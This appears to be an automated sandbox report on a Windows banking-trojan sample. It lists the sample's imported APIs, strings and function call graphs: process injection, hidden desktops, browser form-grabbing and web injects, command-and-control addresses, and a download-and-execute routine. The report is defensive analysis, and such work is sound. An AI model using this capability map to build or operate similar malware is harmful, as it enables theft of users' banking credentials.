GetProcAddress.KERNEL32 ref: 09827053
GetProcAddress.KERNEL32 ref: 0982706A
GetProcAddress.KERNEL32 ref: 09827081
GetProcAddress.KERNEL32 ref: 09827098
GetProcAddress.KERNEL32 ref: 098270AF
GetProcAddress.KERNEL32 ref: 098270CB
GetProcAddress.KERNEL32 ref: 098270E7
GetProcAddress.KERNEL32 ref: 098270FE
GetProcAddress.KERNEL32 ref: 09827115
GetProcAddress.KERNEL32 ref: 0982712C
GetProcAddress.KERNEL32 ref: 09827143
GetProcAddress.KERNEL32 ref: 0982715A

Part of subcall function 0982F540: MultiByteToWideChar.KERNEL32 ref: 0982F570

Part of subcall function 0982F540: MultiByteToWideChar.KERNEL32 ref: 0982F5CA

Strings

CreateProcessA, xrefs: 09825959
GetLastError, xrefs: 09825A0F
LeaveCriticalSection, xrefs: 09825A2B
NtSetValueKey, xrefs: 0982593D
MenuItemFromPoint, xrefs: 09825DE3
DeleteDC, xrefs: 09825E6F
IsWindowVisible, xrefs: 09825F41
185.81.68.148, xrefs: 098255BD
GET , xrefs: 09825FB1
strtoul, xrefs: 09825A63
NtCreateThreadEx, xrefs: 09825967
tolower, xrefs: 09825A47
identity, xrefs: 09826091
CloseHandle, xrefs: 0982594B
GetModuleHandleA, xrefs: 09825AD3
GetProcAddress, xrefs: 09825737
WaitForSingleObject, xrefs: 09825CBD
HttpQueryInfoW, xrefs: 09825D1F
SelectObject, xrefs: 09825EED
socket, xrefs: 09825895
ShellExecuteA, xrefs: 09825C77
GetInjects, xrefs: 0982604B
Secur32.dll, xrefs: 0982563B
http(s)://, xrefs: 09826127
GetFileVersionInfoA, xrefs: 09825AEF
Content-Length: , xrefs: 09825FE9
CreateToolhelp32Snapshot, xrefs: 09825A8D
KernelBase.dll, xrefs: 098255F5
GetWindowThreadProcessId, xrefs: 098259F3
GetWindowLongA, xrefs: 09825E29
SetThreadContext, xrefs: 098259BB
text/html, xrefs: 098260D0
.exe, xrefs: 09825F87
Process32Next, xrefs: 09825AA9
nss3.dll, xrefs: 09826059
CopyFileA, xrefs: 098257D1
PR_Write, xrefs: 09826075
WriteProcessMemory, xrefs: 0982571B
ws2_32.dll, xrefs: 09825657
Advapi32.dll, xrefs: 09825649
GetTempFileNameA, xrefs: 09825C69
GetUserNameExA, xrefs: 098257ED
FindWindowA, xrefs: 09825983
chunked, xrefs: 09826005
Content-Length: , xrefs: 09825ECA
open, xrefs: 0982616D
Psapi.dll, xrefs: 09825673
memcpy, xrefs: 09825913
free, xrefs: 098256FF
GetVolumeInformationA, xrefs: 098257DF
RealGetWindowClassA, xrefs: 09825DF1
GetNativeSystemInfo, xrefs: 09825BCF
CreateMutexA, xrefs: 09825CA1
GetPrivateProfileStringA, xrefs: 09825B43
StretchBlt, xrefs: 09825EC3
GetFileVersionInfoSizeA, xrefs: 09825AE1
isdigit, xrefs: 09825A55
GetCurrentProcessId, xrefs: 09825CD9
LocalFree, xrefs: 09825817
_errno, xrefs: 09825A39
GetUserNameW, xrefs: 09825BF9
VirtualAllocEx, xrefs: 0982570D
/VzCAHn.php, xrefs: 098255D2
Kernel32.dll, xrefs: 098255A8
CreateCompatibleBitmap, xrefs: 09825F17
RtlCompressBuffer, xrefs: 09825D2D
form|%s|%s|%s|%d|, xrefs: 09826143
SHGetFolderPathA, xrefs: 098257A7
TerminateProcess, xrefs: 09825975
ReleaseDC, xrefs: 09825E7D
ntdll.dll, xrefs: 09825611
:Zone.Identifier, xrefs: 0982569D
CreateNamedPipeA, xrefs: 09825C23
RegQueryValueExA, xrefs: 09825E53
gethostbyname, xrefs: 098258A3
SetThreadDesktop, xrefs: 09825D49
GetModuleInformation, xrefs: 09825B0B
GetModuleFileNameA, xrefs: 09825753
SendMessageA, xrefs: 09825D8F
wsprintfA, xrefs: 098256E3
Process32First, xrefs: 09825A9B
PtInRect, xrefs: 09825DFF
SetStretchBltMode, xrefs: 09825ED8
Content-Length, xrefs: 09825E84
GetTempPathA, xrefs: 09825C5B
PostMessageA, xrefs: 09825D81
WideCharToMultiByte, xrefs: 098256C7
GetTopWindow, xrefs: 09825F79
CreateCompatibleDC, xrefs: 09825F02
Firefox, xrefs: 09825EB5
ConvertSidToStringSidA, xrefs: 09825809
memset, xrefs: 09825905
StrChrA, xrefs: 09825AB7
HttpQueryInfoA, xrefs: 09825D11
send, xrefs: 098258CD
Host: , xrefs: 09826119
NtQueryInformationProcess, xrefs: 0982599F
CreateDesktopA, xrefs: 09825D57
PathFindFileNameA, xrefs: 09825761
ChildWindowFromPoint, xrefs: 09825D9D
memcmp, xrefs: 09825B19
WSAStartup, xrefs: 09825887
StrStrA, xrefs: 0982584F
GetComputerNameW, xrefs: 09825C07
closesocket, xrefs: 098258E9
GetWindowsDirectoryA, xrefs: 098256B9
realloc, xrefs: 09825879
GetWindow, xrefs: 09825F56
StrStrIA, xrefs: 0982585D
MessageBoxA, xrefs: 098256AB
GetWindowRect, xrefs: 09825DC7
SHFileOperationA, xrefs: 098259C9
Connection, xrefs: 0982609F
, xrefs: 098260F6
ntohs, xrefs: 09825C93
LocalAlloc, xrefs: 098256D5
PathRemoveFileSpecA, xrefs: 09825745
SetWindowLongA, xrefs: 09825E1B
CreateThread, xrefs: 09825BEB
RegSetValueExA, xrefs: 09825B7B
RtlGetCompressionWorkSpaceSize, xrefs: 09825D3B
GetDesktopWindow, xrefs: 09825E61
malloc, xrefs: 09825825
185.81.68.147, xrefs: 098255A1
Transfer-Encoding, xrefs: 09825E8B
GetMenuItemID, xrefs: 09825DD5
PrintWindow, xrefs: 09825F6B
GetThreadContext, xrefs: 098259AD
GetPrivateProfileSectionNamesA, xrefs: 09825B35
EnterCriticalSection, xrefs: 09825A1D
RegOpenKeyExA, xrefs: 09825B89
connect, xrefs: 098258BF
lstrlenA, xrefs: 0982578B
isxdigit, xrefs: 09825A71
wininet.dll, xrefs: 09825681
strncmp, xrefs: 0982576F
WSACleanup, xrefs: 098258F7
StrToIntA, xrefs: 09825AC5
bot|%s|%d|%d|%d|%d|%s|%s|%d|%d, xrefs: 09826151
OpenDesktopA, xrefs: 09825D65
LoadLibraryA, xrefs: 098255AF
GetVersionExA, xrefs: 09825C15
ExpandEnvironmentStringsA, xrefs: 09825B27
POST , xrefs: 09825FA3
strtol, xrefs: 0982586B
ReleaseMutex, xrefs: 09825CAF
GetFileSize, xrefs: 09825BA5
User32.dll, xrefs: 098255E7
ScreenToClient, xrefs: 09825DAB
version.dll, xrefs: 09825665
Shell32.dll, xrefs: 0982562D
DisconnectNamedPipe, xrefs: 09825C3F
WindowFromPoint, xrefs: 09825E37
NtUnmapViewOfSection, xrefs: 09825991
gdi32.dll, xrefs: 0982568F
ping, xrefs: 0982602F
ResumeThread, xrefs: 09825BB3
Content-Type: , xrefs: 098260BB
PR_Read, xrefs: 09826067
InitializeCriticalSection, xrefs: 09825A01
ExitProcess, xrefs: 09825799
FindFirstFileA, xrefs: 098259D7
lstrcatA, xrefs: 098257C3
firefox.exe, xrefs: 0982603D
SHAppBarMessage, xrefs: 09825E45
VerQueryValueA, xrefs: 09825AFD
PathFileExistsA, xrefs: 09825CF5
HTTP/1.1, xrefs: 09825FBF
DeleteObject, xrefs: 09825E99
ConnectNamedPipe, xrefs: 09825C31
lstrcmpA, xrefs: 09825841
recv, xrefs: 098258DB
OpenProcess, xrefs: 09825BDD
_strnicmp, xrefs: 0982577D
Host: , xrefs: 09825FCD
EnumWindows, xrefs: 09825CCB
WriteFile, xrefs: 09825B6D
form|%s|%s|%d|, xrefs: 09826135
TerminateThread, xrefs: 09825D73
Accept-Encoding, xrefs: 09826083
Location: , xrefs: 098260E1
%s: *, xrefs: 0982610B
MoveWindow, xrefs: 09825DB9
GetWindowPlacement, xrefs: 09825E0D
htons, xrefs: 098258B1
Sleep, xrefs: 09825921
CreateFileA, xrefs: 09825B51
CreateRemoteThread, xrefs: 09825729
ioctlsocket, xrefs: 09825C85
ReadFile, xrefs: 09825B5F
CreateDirectoryA, xrefs: 09825D03
DeleteFileA, xrefs: 09825CE7
msvcrt.dll, xrefs: 09825603
HTTP/1.1 200 OK, xrefs: 09825FF7
Mozilla, xrefs: 0982615F
close, xrefs: 098260AD
InternetCrackUrlA, xrefs: 09825C4D
Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3, xrefs: 09825FDB
NtOpenKey, xrefs: 0982592F
LookupAccountNameA, xrefs: 098257FB
GetDIBits, xrefs: 09825EAE
Shlwapi.dll, xrefs: 0982561F
lstrcpyA, xrefs: 098257B5
lstrcmpiA, xrefs: 09825833
strtod, xrefs: 09825A7F
GetDC, xrefs: 09825F2C
FindNextFileA, xrefs: 098259E5
RegCloseKey, xrefs: 09825B97
MultiByteToWideChar, xrefs: 098256F1
IsWow64Process, xrefs: 09825BC1

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ByteCharMultiWide
String ID: $%s: *$Content-Length: $Content-Type: $Host: $Location: $Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3$ HTTP/1.1$.exe$/VzCAHn.php$185.81.68.147$185.81.68.148$:Zone.Identifier$Accept-Encoding$Advapi32.dll$ChildWindowFromPoint$CloseHandle$ConnectNamedPipe$Connection$Content-Length$Content-Length: $ConvertSidToStringSidA$CopyFileA$CreateCompatibleBitmap$CreateCompatibleDC$CreateDesktopA$CreateDirectoryA$CreateFileA$CreateMutexA$CreateNamedPipeA$CreateProcessA$CreateRemoteThread$CreateThread$CreateToolhelp32Snapshot$DeleteDC$DeleteFileA$DeleteObject$DisconnectNamedPipe$EnterCriticalSection$EnumWindows$ExitProcess$ExpandEnvironmentStringsA$FindFirstFileA$FindNextFileA$FindWindowA$Firefox$GET $GetComputerNameW$GetCurrentProcessId$GetDC$GetDIBits$GetDesktopWindow$GetFileSize$GetFileVersionInfoA$GetFileVersionInfoSizeA$GetInjects$GetLastError$GetMenuItemID$GetModuleFileNameA$GetModuleHandleA$GetModuleInformation$GetNativeSystemInfo$GetPrivateProfileSectionNamesA$GetPrivateProfileStringA$GetProcAddress$GetTempFileNameA$GetTempPathA$GetThreadContext$GetTopWindow$GetUserNameExA$GetUserNameW$GetVersionExA$GetVolumeInformationA$GetWindow$GetWindowLongA$GetWindowPlacement$GetWindowRect$GetWindowThreadProcessId$GetWindowsDirectoryA$HTTP/1.1 200 OK$Host: $HttpQueryInfoA$HttpQueryInfoW$InitializeCriticalSection$InternetCrackUrlA$IsWindowVisible$IsWow64Process$Kernel32.dll$KernelBase.dll$LeaveCriticalSection$LoadLibraryA$LocalAlloc$LocalFree$LookupAccountNameA$MenuItemFromPoint$MessageBoxA$MoveWindow$Mozilla$MultiByteToWideChar$NtCreateThreadEx$NtOpenKey$NtQueryInformationProcess$NtSetValueKey$NtUnmapViewOfSection$OpenDesktopA$OpenProcess$POST $PR_Read$PR_Write$PathFileExistsA$PathFindFileNameA$PathRemoveFileSpecA$PostMessageA$PrintWindow$Process32First$Process32Next$Psapi.dll$PtInRect$ReadFile$RealGetWindowClassA$RegCloseKey$RegOpenKeyExA$RegQueryValueExA$RegSetValueExA$ReleaseDC$ReleaseMutex$ResumeThread$RtlCompressBuffer$RtlGetCompressionWorkSpaceSize$SHAppBarMessage$SHFileOperationA$SHGetFolderPathA$ScreenToClient$Secur32.dll$SelectObject$SendMessageA$SetStretchBltMode$SetThreadContext$SetThreadDesktop$SetWindowLongA$Shell32.dll$ShellExecuteA$Shlwapi.dll$Sleep$StrChrA$StrStrA$StrStrIA$StrToIntA$StretchBlt$TerminateProcess$TerminateThread$Transfer-Encoding$User32.dll$VerQueryValueA$VirtualAllocEx$WSACleanup$WSAStartup$WaitForSingleObject$WideCharToMultiByte$WindowFromPoint$WriteFile$WriteProcessMemory$_errno$_strnicmp$bot|%s|%d|%d|%d|%d|%s|%s|%d|%d$chunked$close$closesocket$connect$firefox.exe$form|%s|%s|%d|$form|%s|%s|%s|%d|$free$gdi32.dll$gethostbyname$htons$http(s)://$identity$ioctlsocket$isdigit$isxdigit$lstrcatA$lstrcmpA$lstrcmpiA$lstrcpyA$lstrlenA$malloc$memcmp$memcpy$memset$msvcrt.dll$nss3.dll$ntdll.dll$ntohs$open$ping$realloc$recv$send$socket$strncmp$strtod$strtol$strtoul$text/html$tolower$version.dll$wininet.dll$ws2_32.dll$wsprintfA
API String ID: 2683923594-1492645186
Opcode ID: 8d59903077919d75a48de8f6b3917833d6ddf00dddff58a82a888e902bab9895
Instruction ID: c795681c620f7dddcb3fabe99ffe4de0638db3ea435fbe1a600badedd1d750cc
Opcode Fuzzy Hash: 8d59903077919d75a48de8f6b3917833d6ddf00dddff58a82a888e902bab9895
Instruction Fuzzy Hash: 0E034B38619F4185EB82CF42F88839533A9F74BB95F419226C88E4B727EF79C198D744

Function 098217F0 Relevance: 84.3, APIs: 35, Strings: 13, Instructions: 267
stringfilethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 09822660: WideCharToMultiByte.KERNEL32 ref: 098226A3

malloc.LIBCMT ref: 09821878

Part of subcall function 0983D70C: _FF_MSGBANNER.LIBCMT ref: 0983D73C
Part of subcall function 0983D70C: _NMSG_WRITE.LIBCMT ref: 0983D746
Part of subcall function 0983D70C: HeapAlloc.KERNEL32 ref: 0983D761
Part of subcall function 0983D70C: _callnewh.LIBCMT ref: 0983D77A
Part of subcall function 0983D70C: _errno.LIBCMT ref: 0983D785
Part of subcall function 0983D70C: _errno.LIBCMT ref: 0983D790

PathFindFileNameA.SHLWAPI ref: 09821883
lstrcpyA.KERNEL32 ref: 09821897
SHGetFolderPathA.SHELL32 ref: 098218CF
lstrcatA.KERNEL32 ref: 098218E0
lstrcatA.KERNEL32 ref: 098218F1
PathFileExistsA.SHLWAPI ref: 098218FB
lstrcmpiA.KERNEL32 ref: 0982191F
lstrcmpiA.KERNEL32 ref: 09821933
lstrcmpiA.KERNEL32 ref: 09821947
lstrcmpiA.KERNEL32 ref: 0982195B
lstrcmpiA.KERNEL32 ref: 0982196F
lstrcmpiA.KERNEL32 ref: 09821983
lstrcmpiA.KERNEL32 ref: 09821997
lstrcatA.KERNEL32 ref: 098219AB
lstrcmpiA.KERNEL32 ref: 098219C8
lstrcmpiA.KERNEL32 ref: 098219E2
PathFindFileNameW.SHLWAPI ref: 098219F8
CreateThread.KERNEL32 ref: 09821A15
TerminateProcess.KERNEL32 ref: 09821AD8
wsprintfA.USER32 ref: 09821B0E
CreateFileA.KERNEL32 ref: 09821B40
WriteFile.KERNEL32 ref: 09821B60
WriteFile.KERNEL32 ref: 09821B7C
lstrlenA.KERNEL32 ref: 09821B8F
WriteFile.KERNEL32 ref: 09821BAF
WriteFile.KERNEL32 ref: 09821BCA
lstrlenA.KERNEL32 ref: 09821BD3
WriteFile.KERNEL32 ref: 09821BF3
WriteFile.KERNEL32 ref: 09821C0E
CloseHandle.KERNEL32 ref: 09821C17
free.LIBCMT ref: 09821C20
free.LIBCMT ref: 09821C28

Part of subcall function 0983D6CC: HeapFree.KERNEL32 ref: 0983D6E2
Part of subcall function 0983D6CC: _errno.LIBCMT ref: 0983D6EC
Part of subcall function 0983D6CC: GetLastError.KERNEL32 ref: 0983D6F4

free.LIBCMT ref: 09821C30
free.LIBCMT ref: 09821C39

Strings

trusteer, xrefs: 098218E6
msedge.exe, xrefs: 0982193D
--disable-http2 --use-spdy=off --disable-quic, xrefs: 098219A1
browser.exe, xrefs: 09821965
opera.exe, xrefs: 09821929
brave.exe, xrefs: 09821951
\\.\pipe\%s, xrefs: 09821B00
AVGBrowser.exe, xrefs: 0982198D
AvastBrowser.exe, xrefs: 09821979
taskmgr.exe, xrefs: 098219CE
firefox.exe, xrefs: 098219BE
Diamotrixed, xrefs: 09821AF9
chrome.exe, xrefs: 0982190F

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$taskmgr.exe$trusteer
API String ID: 3240663557-1393645298
Opcode ID: 99ad222673ba694320bb615da2a5c6662173702eac1b7259930a67c36a373a93
Instruction ID: 20045af85c5eff8b477fedb2341332ad28d4bf733d65548d34da081ac6636fd4
Opcode Fuzzy Hash: 99ad222673ba694320bb615da2a5c6662173702eac1b7259930a67c36a373a93
Instruction Fuzzy Hash: A5C15132608B5586EB50DF26EC5479A77A1F78AB88F819125DE4E87B28DF3CC14DCB40

Function 098272C0 Relevance: 60.4, APIs: 40, Instructions: 363
stringnetworkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpyA.KERNEL32 ref: 0982731E
lstrcatA.KERNEL32 ref: 0982732F
lstrcatA.KERNEL32 ref: 09827343
lstrcatA.KERNEL32 ref: 09827357
lstrcatA.KERNEL32 ref: 09827368
lstrcatA.KERNEL32 ref: 0982737C
lstrcatA.KERNEL32 ref: 0982739A
wsprintfA.USER32 ref: 098273B2
lstrcatA.KERNEL32 ref: 098273C6
lstrcatA.KERNEL32 ref: 098273DA
lstrcatA.KERNEL32 ref: 09827416
WSAStartup.WS2_32 ref: 09827426
socket.WS2_32 ref: 09827442
gethostbyname.WS2_32 ref: 09827459
memcpy.MSVCRT ref: 09827479
htons.WS2_32 ref: 09827488
connect.WS2_32 ref: 0982749F
lstrlenA.KERNEL32 ref: 098274B5
send.WS2_32 ref: 098274CB
send.WS2_32 ref: 098274EC
recv.WS2_32 ref: 09827553
lstrcmpiA.KERNEL32 ref: 098275B3
lstrlenA.KERNEL32 ref: 098275D7
StrStrA.SHLWAPI ref: 098275EF
lstrcmpiA.KERNEL32 ref: 0982760E
strtol.MSVCRT ref: 09827626
lstrcmpiA.KERNEL32 ref: 09827648
lstrcmpiA.KERNEL32 ref: 0982765C
malloc.MSVCRT ref: 098276DA
recv.WS2_32 ref: 09827707
strtol.MSVCRT ref: 09827762
realloc.MSVCRT ref: 098277A9
recv.WS2_32 ref: 098277D6
recv.WS2_32 ref: 098277FB
malloc.MSVCRT ref: 09827858
recv.WS2_32 ref: 09827883
free.MSVCRT ref: 098278C5
closesocket.WS2_32 ref: 098278CE
WSACleanup.WS2_32 ref: 098278D4

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcat$recv$lstrcmpi$lstrlenmallocsendstrtol$CleanupStartupclosesocketconnectfreegethostbynamehtonslstrcpymemcpyreallocsocketwsprintf
String ID:
API String ID: 4277384649-0
Opcode ID: ac0048a8c1b97b5be37f734cf37a3f7532f8c13e2c97d188fb481249bfdad725
Instruction ID: b4bfea369d2e606b1e17596a4251fd6e183f4c4f8205d8d67079ad4fd06b5d47
Opcode Fuzzy Hash: ac0048a8c1b97b5be37f734cf37a3f7532f8c13e2c97d188fb481249bfdad725
Instruction Fuzzy Hash: F1F1D372305A818AEB30DF27E8443AA77A1F759B89F44A129CA4FCBB15DF78D184C744

Function 098351E0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 144
stringfilenetworkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32 ref: 09835282
InternetCrackUrlA.WININET ref: 09835297

Part of subcall function 098272C0: lstrcpyA.KERNEL32 ref: 0982731E
Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 0982732F
Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 09827343
Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 09827357
Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 09827368
Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 0982737C
Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 0982739A
Part of subcall function 098272C0: wsprintfA.USER32 ref: 098273B2
Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 098273C6
Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 098273DA
Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 09827416
Part of subcall function 098272C0: WSAStartup.WS2_32 ref: 09827426
Part of subcall function 098272C0: socket.WS2_32 ref: 09827442
Part of subcall function 098272C0: gethostbyname.WS2_32 ref: 09827459
Part of subcall function 098272C0: memcpy.MSVCRT ref: 09827479
Part of subcall function 098272C0: htons.WS2_32 ref: 09827488
Part of subcall function 098272C0: connect.WS2_32 ref: 0982749F
Part of subcall function 098272C0: lstrlenA.KERNEL32 ref: 098274B5
Part of subcall function 098272C0: send.WS2_32 ref: 098274CB

PathFindFileNameW.SHLWAPI ref: 0983531C
GetTempPathW.KERNEL32 ref: 09835336
GetTempFileNameW.KERNEL32 ref: 0983534C
lstrcatW.KERNEL32 ref: 0983535C
lstrcatW.KERNEL32 ref: 09835368
CreateFileW.KERNEL32 ref: 09835391
WriteFile.KERNEL32 ref: 098353B6
free.MSVCRT ref: 098353C5
CloseHandle.KERNEL32 ref: 098353CE
ShellExecuteW.SHELL32 ref: 098353FC
CloseHandle.KERNEL32 ref: 0983540B
free.MSVCRT ref: 09835416

Strings

open, xrefs: 098353E0

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcat$File$CloseHandleNamePathTempfreelstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
String ID: open
API String ID: 3619236930-2758837156
Opcode ID: 7ad832edc24f0e499001a067034fa4c443532b192f0a6fea87c3cbcc4a0b7810
Instruction ID: 5c41375c2fa41e059c57cfd29230835921fcfd28047722367ed0b958f949c216
Opcode Fuzzy Hash: 7ad832edc24f0e499001a067034fa4c443532b192f0a6fea87c3cbcc4a0b7810
Instruction Fuzzy Hash: A8518472714A5086FB14CF66E85439E77A0F789B88F849429EE4E87B58DF78C149CB40

Function 09835570 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameW.ADVAPI32 ref: 09835629
GetComputerNameW.KERNEL32 ref: 09835643

Part of subcall function 0982F480: WideCharToMultiByte.KERNEL32 ref: 0982F4C3

GetNativeSystemInfo.KERNEL32 ref: 0983566C
GetVersionExA.KERNEL32 ref: 0983567D
wsprintfA.USER32 ref: 098356CD

Part of subcall function 09829450: EnterCriticalSection.KERNEL32 ref: 09829498
Part of subcall function 09829450: RtlInitializeCriticalSection.NTDLL ref: 098294A5
Part of subcall function 09829450: lstrcpyA.KERNEL32 ref: 098294DA
Part of subcall function 09829450: lstrcpyA.KERNEL32 ref: 098294FD
Part of subcall function 09829450: lstrcatA.KERNEL32 ref: 0982950D
Part of subcall function 09829450: lstrcatA.KERNEL32 ref: 0982951D
Part of subcall function 09829450: LeaveCriticalSection.KERNEL32 ref: 098295A4
Part of subcall function 09829450: memcpy.MSVCRT ref: 098295BC
Part of subcall function 09829450: lstrlenA.KERNEL32 ref: 098295CA

free.MSVCRT ref: 098356E1

Strings

2.1, xrefs: 098356B6

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: CriticalSection$Namelstrcatlstrcpy$ByteCharComputerEnterInfoInitializeLeaveMultiNativeSystemUserVersionWidefreelstrlenmemcpywsprintf
String ID: 2.1
API String ID: 2800961625-2188894714
Opcode ID: 548dfce6f61ac98489f05572c49c3bf2591e801de7b04bdd32ccd213bb45216d
Instruction ID: c092b957021d974c44aed12b4905d2e4fd8c86de89c70cf81871c5867b0a3d1f
Opcode Fuzzy Hash: 548dfce6f61ac98489f05572c49c3bf2591e801de7b04bdd32ccd213bb45216d
Instruction Fuzzy Hash: 5741B132614A80DAE720CF76E8543DE77B5F789788F809009EA4D87B58DF79C249CB41

Function 098288B0 Relevance: 9.1, APIs: 6, Instructions: 73
memorythreadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 0982890B
GetCurrentThreadId.KERNEL32 ref: 09828917
HeapAlloc.KERNEL32 ref: 09828941
HeapReAlloc.KERNEL32 ref: 0982896A
Thread32Next.KERNEL32 ref: 098289A0
CloseHandle.KERNEL32 ref: 098289B0

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
String ID:
API String ID: 3234909527-0
Opcode ID: 8feb2644561010b961152437857cd8564b3064406f8d9a6e20686534e0cc2a88
Instruction ID: 522c56270222ab0fc899c77acd8d23392cff9ec936b2f3b6be75dc4e6a227ae5
Opcode Fuzzy Hash: 8feb2644561010b961152437857cd8564b3064406f8d9a6e20686534e0cc2a88
Instruction Fuzzy Hash: 41314332208A4186EF24CF25E454319B3A1F789B98F48C219DB9D87759DF38C185CF52

Function 09827B10 Relevance: 4.6, APIs: 3, Instructions: 102memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 09827B2C
VirtualAlloc.KERNEL32 ref: 09827BCC
VirtualAlloc.KERNEL32 ref: 09827C1C

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: AllocVirtual$InfoSystem
String ID:
API String ID: 2622297391-0
Opcode ID: 9376aa2f0c253af331e9382ad1490ff95537631666a6fae9671663dacc052423
Instruction ID: f19f4bc42f4a8aaab5898a56f21ab348bb794eb63bb6afababed509ac94be4f8
Opcode Fuzzy Hash: 9376aa2f0c253af331e9382ad1490ff95537631666a6fae9671663dacc052423
Instruction Fuzzy Hash: 4F319E21706B6486EF118F23E41036AA7A1F759FD4F488139EE4D8BB58EF3CD4818740

Function 0983B410 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 101
stringthreadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32 ref: 0983B453
PathFindFileNameA.SHLWAPI ref: 0983B45E
lstrcmpiA.KERNEL32 ref: 0983B471
CreateThread.KERNEL32 ref: 0983B4AD
lstrcmpiA.KERNEL32 ref: 0983B4C7
lstrcmpiA.KERNEL32 ref: 0983B4E5
lstrcmpiA.KERNEL32 ref: 0983B505
lstrcmpiA.KERNEL32 ref: 0983B528
lstrcmpiA.KERNEL32 ref: 0983B54B
lstrcmpiA.KERNEL32 ref: 0983B56E

Part of subcall function 0983B3C0: CreateMutexA.KERNEL32 ref: 0983B3D0
Part of subcall function 0983B3C0: CloseHandle.KERNEL32 ref: 0983B3E0

CreateThread.KERNEL32 ref: 0983B5A4

Strings

msedge.exe, xrefs: 0983B4FB
browser.exe, xrefs: 0983B564
rbNSpGEsyb, xrefs: 0983B47D
opera.exe, xrefs: 0983B51E
brave.exe, xrefs: 0983B541
explorer.exe, xrefs: 0983B464
firefox.exe, xrefs: 0983B4BD
chrome.exe, xrefs: 0983B4DB

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi$Create$FileNameThread$CloseFindHandleModuleMutexPath
String ID: brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe$rbNSpGEsyb
API String ID: 936357808-3480109235
Opcode ID: ca7cf2f7333e9c74630c9c8955ded9afe126b29924dd5ef945dd6746575d4bbb
Instruction ID: 59a50caca33d6386b049cfa383da2209b87fbb048ed75049e7c17fc0394c4a9c
Opcode Fuzzy Hash: ca7cf2f7333e9c74630c9c8955ded9afe126b29924dd5ef945dd6746575d4bbb
Instruction Fuzzy Hash: 5C415160210A0181EB54EF76F8507AE2394FB86784F85F029D94FC6769EF7DC148C792

Function 0982F2E0 Relevance: 16.6, APIs: 11, Instructions: 112
memoryfileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
